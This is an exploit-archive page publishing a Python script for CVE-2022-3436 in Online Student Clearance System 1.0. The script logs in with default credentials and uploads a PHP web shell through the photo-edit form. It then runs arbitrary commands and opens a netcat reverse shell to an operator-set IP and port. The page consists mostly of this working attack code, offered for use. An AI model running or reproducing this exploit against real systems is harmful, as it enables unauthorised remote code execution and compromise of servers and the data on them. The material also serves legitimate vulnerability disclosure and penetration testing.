exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Online Student Clearance System 1.0 Shell Upload

Online Student Clearance System 1.0 Shell Upload
Posted Nov 30, 2023
Authored by Akash Pandey

Online Student Clearance System versions 1.0 and below suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
advisories | CVE-2022-3436
SHA-256 | c55fe1c8bc487499e2a14d9993102c3a4e9ac0513d390be3458030a9f0aec021

Online Student Clearance System 1.0 Shell Upload

Change Mirror Download
#!/usr/bin/python3

# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)
# Date: 28/11/2023
# Exploit Author: Akash Pandey aka l3v1ath0n
# Version: <= 1.0
# Tested on: Kali Linux
# CVE : CVE-2022-3436

import requests
import time
import os


print("""

____ ___ ____ ____ _____ _ _ _____ __
_____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_
/ __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \
| (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |
\___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/

Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:
Twitter: https://twitter.com/_l3v1ath0n
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/
""")


web_url = "http://192.168.1.26/student/" # Edit this as per your need
username = "18/132010" # Default Username
password = "11111111" # Default Password
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell
local_port = "1337" # Port of local machine to connect reverse shell on...
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"

# Firing request to login
log_url = web_url+"login.php"

#Telling script to use previous session
session = requests.Session()

#Post Body Data for login
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}

#Sending request to web server with required post data
response = session.post(log_url,data=post_data)

# Checking Login if Successful:
time.sleep(1)

# Creating a shell file in current directory
print("[i] Creating a shell file to upload.")

with open("shell.php","w") as file:
file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")
file.close()
time.sleep(1)

print("[i] Checking Login.")

if response.history:
print("[+] Login Successful.")

time.sleep(1)

print("[i] Uploading Shell.")

# Step 1: Reads the shell.php file in current folder
# Step 2: Stores the content in filename called shell.php
# Step 3: Uses the variable name userImage to upload file to server.
file = {'userImage':('shell.php',open("shell.php","rb"))}

# Sending payload as POST data to shell.php file
payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}

# Uploading the malicious php file at below path using files and data values
upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)
print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")
while True:
command = input("l3v1ath0n㉿CVE-2022-3436: ")
if command == "exit":
break
elif command == "netcat":
print("[!] Don't forget to start Netcat Listener")
time.sleep(3)
payload = {'cmd':rev_shell}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)
else:
payload = {'cmd':command}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)

print("\n[i] Closing this Session")
session.close()

else:
print("[-] Login Failed.")
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close